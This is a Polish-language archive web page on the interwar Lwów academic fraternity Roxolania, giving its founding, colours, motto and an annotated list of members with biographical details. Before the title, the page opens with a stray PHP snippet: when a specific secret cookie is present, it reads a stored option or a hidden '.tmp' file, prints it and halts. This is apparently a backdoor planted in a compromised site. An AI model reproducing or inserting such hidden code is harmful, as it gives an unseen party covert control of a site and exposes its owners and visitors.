if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Roxolania

Dekiel Roxolanii - vide Poszukiwania. Nazwa:
Polska Korporacja Akademicka “Roxolania”
Siedziba:
Lwów
Data powstania:
październik 1926 r.
Barwy:
amarantowa – srebrna – czarna
Dewiza:
„Służymy sztuce i nauce, one bowiem wywalczą nam stanowisko wśród narodów”

Rys historyczny

Roxolania powstała w październiku 1926 r. ze Związku Akademickiego “Tres Artes”. Od 1927 r. należała do Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: 23 V 1927 r.). Kandydowała pod opieką K! Znicz. Prawa członka rzeczywistego Związku uzyskała dnia 7 XII 1928 r.

Całkowita ustalona, choć niekompletna imienna lista członków obejmuje 57 nazwisk, w tym czterech członków honorowych.

Brak wiadomości o powojennej działalności korporacji i spotkaniach jej członków

Lista członków

Poniższa, niekompletna lista członków Roxolanii obejmuje 57 nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi

 1. Edmund Bulanda, (28 października 1882 w Krakowie - 3 kwietnia 1951 we Wrocławiu) absolwent Gimnazjum św. Anny w Krakowie 1902, student i absolwent UJ 1903-1907, doktorat UJ 1908, odbył podróże naukowe do Wiednia, Berlina, Monachium, Florencji, Rzymu, na Sycylię, do Grecji i Azji Mniejszej, pracując w tamtejszych muzeach oraz uczestnicząc w pracach wykopaliskowych 1907-13, habilitacja z archeologii klasycznej UJ 1913, w czasie I wojny światowej służył w armii austriackiej 1915-16, od 1916 prof. nadzw. UJK, od 1920 prof. zw. UJK, uczestnik ochotniczej obrony Lwowa, dwukrotnie dziekan Wydziału Humanistycznego, wybrany na rektora UJK 1933 (z powodu sprzeciwu ministra oświaty Janusza Jędrzejewicza nie objął stanowiska), rektor UJK 1938-39, Filister honorowy Roxolanii, w okresie okupacji niemieckiej rektor tajnego UJK 1941-44 oraz Delegat Rządu we Lwowie 1941-42, po wojnie zmuszony do wyjazdu do Wrocławia, od 1946 prof. UWr., w pracy naukowej zajmował się rzeźbą antyczną, uzbrojeniem antycznym i dziejami Etrusków, autor ok. 50 prac naukowych, prezes Polskiego Towarzystwa Archeologicznego, pochowany na Cmentarzu Św. Wawrzyńca we Wrocławiu
 2. Przemysław Dąbkowski, (23 lutego 1877 we Lwowie - 18 grudnia 1950 we Lwowie) s. Bonifacego Korczak-Dąbkowskiego i Heleny z Krassowskich, uczeń gimnazjów w Stryju i Lwowie, student prawa Uniwersytet Lwowski 1895-99, dr praw 1900, adiunkt w Archiwum Krajowym Aktów Grodzkich i Ziemskich 1901-15, studiował historię kultury, teorię i historię prawa na uniwersytetach w Berlinie 1903-04 oraz w Paryżu 1907-08, po habilitacji od 1906 docent w Katedrze Historii Prawa Polskiego UL, od 1910 prof. nadzw., druga habilitacja w dziedzinie prawa niemieckiego 1913, kierownik Katedry Historii Prawa Niemieckiego 1916-19 i Dawnego Prawa Polskiego 1920-39, trzykrotnie dziekan Wydziału Prawa 1920/21, 1925/26, 1927/28, Filister honorowy Roxolanii, w czasie pierwszej okupacji sowieckiej Lwowa kierownik Katedry Historii Państwa i Prawa 1939-41, w czasie okupacji niemieckiej Lwowa pracownik filii krakowskiego Instytutu Niemieckiej Pracy na Wschodzie (Institut für Deutsche Ostarbeit), wykładał także na tajnym UJK, pozostał we Lwowie także po wojnie, pracował w Katedrze Historii Prawa Uniwersytetu im. Iwana Franki, specjalista w zakresie historii polskiego prawa cywilnego, prawa litewskiego i niemieckiego, od 1917 członek-korespondent AU (późniejsza PAU), członek i sekretarz generalny 1920-39 Towarzystwa Naukowego we Lwowie odznaczony m.in. Krzyżem Komandorskim Orderu Polonia Restituta 1929 oraz francuskimi Palmami Akademickimi, pochowany w grobowcu Krzeczunowiczów na Cmentarzu Łyczakowskim
 3. (18 kwietnia 1853 w Snowiczu pow. Złoczów - 17 listopada 1935 we Lwowie) ze Starzyniec, s. Bojomira i Zofii z Kulczyckich, absolwent Gimnazjum im. Franciszka Józefa we Lwowie 1872, absolwent (z odznaczeniem) prawa ULw. 1876, dr praw 1879, współzałożyciel i prezes Biblioteki Słuchaczów Prawa oraz Czytelni Akademickiej, habilitacja z austriackiego prawa politycznego 1883, wykładowca prawa politycznego (konstytucyjnego) ULw. 1883-1935, od 1889 prof. nadzw., od 1892 prof. zw., kierownik katedry prawa politycznego do 1925, dziekan Wydziału Prawa 1895/96 i 1918/19, rektor 1913/14 oraz prorektorem 1914/15, po przejściu na emeryturę prof. honorowy UJK, działacz polityczny, m.in. poseł w Sejmie Krajowym we Lwowie 1907-13, członek wiedeńskiej Izby Poselskiej (Rady Państwa) 1884-88, 1901-07 i 1907-11, autor i współautor licznych aktów prawnych dot. prawa wyborczego, prawa konstytucyjnego i prawa administracyjnego, wiceprezydent Izby Poselskiej 1907-11, w 1909 przyczynił się do rozszerzenia autonomii Galicji (tzw. lex Starzyński), członek austriackiej Izby Panów 1917-18, w II RP miał cieszyć się opinią najwybitniejszego znawcy prawa konstytucyjnego, członek AU (późniejszej PAU), doktor honoris causa USB, obywatel honorowy Rawy Ruskiej, Sokala i Żółkwi, Filister honorowy Leopolii, Roxolanii, Avanguardii, prezes Koła Filistrów Avanguardii, pośmiertnie odznaczony Dyplomem i Złotą Odznaką ZPKA 1937, pochowany w kaplicy przypałacowej w wiosce Derewni k. Żółkwi
 4. Zawadowski, ojciec Adama (Roxolania), dyrektor Zakładu Ubezpieczeń, Filister honorowy Roxolanii

Członkowie rzeczywiści

 1. Władysław Amrugiewicz (Amrogowicz), założyciel Roxolanii, wiceprezes 1927
 2. Władysław Baran, założyciel Roxolanii
 3. Edward Baranowski, założyciel Roxolanii
 4. Marian Basecki, ( - 1943 w Lwowie) ze Stanisławowa, student Wydziału Mechanicznego PL, c. 1932 Slavia, w 1932 przeszedł do Roxolanii, zmarł w więzieniu niemieckim na tyfus
 5. Wilhelm Bielaczyc, (28 maja 1911 w Charkowie - 1940 w Katyniu) s. Antoniego, student Wydziału Mechanicznego PL, c. 1932 Slavia, w 1932 przeszedł do Roxolanii, pchor. wachmistrz (ppor.) rez. artylerii, w wojnie obronnej 1939 w 12 Pułku Piechoty, w niewoli sowieckiej, zamordowany przez NKWD
 6. Antoni Buczek, c. 1933
 7. Stanisław Budzanowski, założyciel Roxolanii
 8. Tadeusz Czaykowski, sekretarz sem. let. 1929/30
 9. Adam Czeredarek, założyciel Roxolanii
 10. Bronisław Czerny (Czarny), założyciel Roxolanii
 11. Jan Drabik, (1913-1980/87? W Poznaniu) c. 1932, po wojnie dyrektor PaFaWag Wrocław i Cegielskiego Poznań
 12. Adam Gawlikowski, (1908 - 1994 w Krakowie) student i absolwent prawa UJK, założyciel Roxolanii, olderman 1927 i sem. zim. i sem. zim. 1929/30, prezes 1930, olderman 1933, w 1935 wicestarosta w Zborowie, od 1936 we Lwowie, m.in. wiceprezes Klubu Młodych przy Kasynie Miejskim we Lwowie, adwokat
 13. Tadeusz Głowiński, założyciel Roxolanii, sekretarz 1927, olderman 1928, wiceprezes 1929
 14. Tadeusz Growiński, akt. 1927-31, I wiceprezes sem. zim. 1929/30, prezes sem. let. 1929/30
 15. Tadeusz Horak, założyciel Roxolanii, pierwszy prezes 1926
 16. Otto Hryculak, założyciel Roxolanii, drugi prezes 1927
 17. Franciszek Jakubowski, założyciel Roxolanii
 18. Władysław Kałuski, założyciel Roxolanii
 19. Stanisław Kazanek, prezes Lwowskiego Koła Międzykorporacyjnego sem. let. 1938/39
 20. Marian Kiciarski, założyciel Roxolanii
 21. Stefan Korcz, założyciel Roxolanii, skarbnik 1928, olderman 1929
 22. Stanisław Kościówka, założyciel Roxolanii
 23. Henryk Kozłowski, (1912 w Borysławiu - 1943 we Lwowie) student Oddziału Elektrotechnicznego PL, c. 1932 Slavia, przeszedł w 1932 do Roxolanii, zmarł w więzieniu niemieckim we Lwowie na tyfus
 24. Stanisław Kościówka (Kościówko), założyciel Roxolanii
 25. Władysław Kropiński, ( - 1939-44) założyciel Roxolanii, prezes sem. zim. 1929/30, mgr praw, adwokat, działacz Stronnictwa Narodowego w Przemyślu, zmarł w czasie okupacji
 26. Eugeniusz Łotocki, c. 1932, akt. 1932-38, mgr praw
 27. Marian Maruszczak, założyciel Roxolanii
 28. Zdzisław Mejer, założyciel Roxolanii
 29. Zdzisław Michalak, c. 1932 Slavia, w 1932 przeszedł do Roxolanii
 30. Stanisław Ochocki, założyciel Roxolanii
 31. Tadeusz Paszyński, student chemii PL, c. 1933
 32. Longin Pluciński, z Poznania, c. 1933, skarbnik Lwowskiego Koła Międzykorporacyjnego 1934/35, skarbnik ZPKA 1935-37 (XIV kadencja), po wojnie na emigracji w Kanadzie, członek Koła Filistrów Polskich Korporacji Akademickich w Montrealu, sekretarz 1972-1974, prezes 1974
 33. Kazimierz Różanowski, założyciel Roxolanii
 34. Walerian Rzońca, ( - ok. 1970 w Krakowie) z Krakowa, założyciel Roxolanii
 35. Roman Schönfeld, założyciel Roxolanii, II wiceprezes sem. zim. oraz sem. let. 1929/30
 36. Zdzisław Sikorski, (1913 w Stanisławowie - 5 marca 1995 w Stalowej Woli) student i absolwent Wydziału Konstrukcji Lotniczych PL, początkowo w Scythii, c. 1932 Slavia, w 1932 przeszedł do Roxolanii, po wojnie nauczyciel w technikum w Stalowej Woli
 37. Strzemieński, olderman 1926
 38. Jan Suchomel, student med. UJK, założyciel Roxolanii
 39. Janusz Symonowicz, (1912 - 1940 w Katyniu ?) ze Skarżyska, student Wydziału Mechanicznego PL, c. 1932 Slavia, w 1932 przeszedł do Roxolanii, pchor. rez., w wojnie obronnej 1939, w niewoli sowieckiej ?, zamordowany przez NKWD ?
 40. Jan Szafrański, (1913 w Łodzi - 1939-45) student Wydziału Mechanicznego PL, c. 1932 Slavia, w 1932 przeszedł do Roxolanii, zginął z załogą Wellingtona w locie bojowym nad Bremą
 41. Stanisław Szaler, ( - 10 listopada 1982)
 42. Jan Szymanowicz,( - po 1980) z Łodzi, c. 1932 Slavia, w 1932 przeszedł do Roxolanii
 43. Bronislaw Tapper, ( - 1975 w Nowym Sączu) c. 1933, akt. 1933-39, inż. mechanik, po wojnie kierownik techniczny warsztatu PKP w Nowym Sączu
 44. Stanisław Terech, (ok. 1910 w Przemysłu - ) student Wydziału Inżynierii Lądowej PL, c. 1928, prezes 1934, wicerpezes, wielokrotny olderman, “wieczny student”, zaginął po aresztowaniu przez NKWD
 45. Mikołaj Wajda, założyciel Roxolanii
 46. Dominik Weber, założyciel Roxolanii, wiceprezes 1927
 47. Bronisław Witter, założyciel Roxolanii
 48. Adam Wondaś, założyciel Roxolanii
 49. Adam Zawadowski, c. 1927, akt. 1927-31, sekretarz sem. zim. 1929/30, I wiceprezes sem. let. 1929/30, prezes 1931 i 1932, mgr praw, adwokat
 50. Zbigniew Zawirski, założyciel Roxolania, akt. 1924-27
 51. Władysław Ząbik, (1915-1974) c. 1934, inż. mechanik, docent na Politechnice Śląskiej
 52. Marian Złochowski, założyciel Roxolanii

  Tadeusz Żółczyński, prawd. ok. 1928 r.

 53. Tadeusz Żółczyński, (1908 w Borysławiu - 24 listopada 1943 w Majdanku) s. Stanisława i Genowefy z d. Jakubowska, absolwent Gimnazjum w Drohobyczu, student i absolwent chemii Wydziału Chemii PL, “znakomity wytwórca ‘kakodylu’ na różne imprezy”, po studiach pracownik przemysłu petrochemicznego, w czasie okupacji działacz organizacji podziemnej, aresztowany 20 lutego 1943 przez Gestapo, osadzony w więzieniu przy ul. Łąckiego, a następnie wywieziony do obozu koncentracyjnego w Majdanku, gdzie zmarł

Listę członków opracowano na podstawie:

1) Zbysław Popławski, Lista członków Polskiej Korporacji Akademickiej Roxolania (Lwów), (w:) Polskie Korporacje Akademickie 1996, nr 11, s. 86 i n.
2) materiałów archiwalnych z Archiwum Korporacyjnego,
3) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korporacji Roxolania.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 12 IX 2010 r.
Ostatnia zmiana 29 X 2011 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Korporacja Roxolania (Lwów), (na:) www.archiwumkorporacyjne.pl, stan 29 X 2011 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }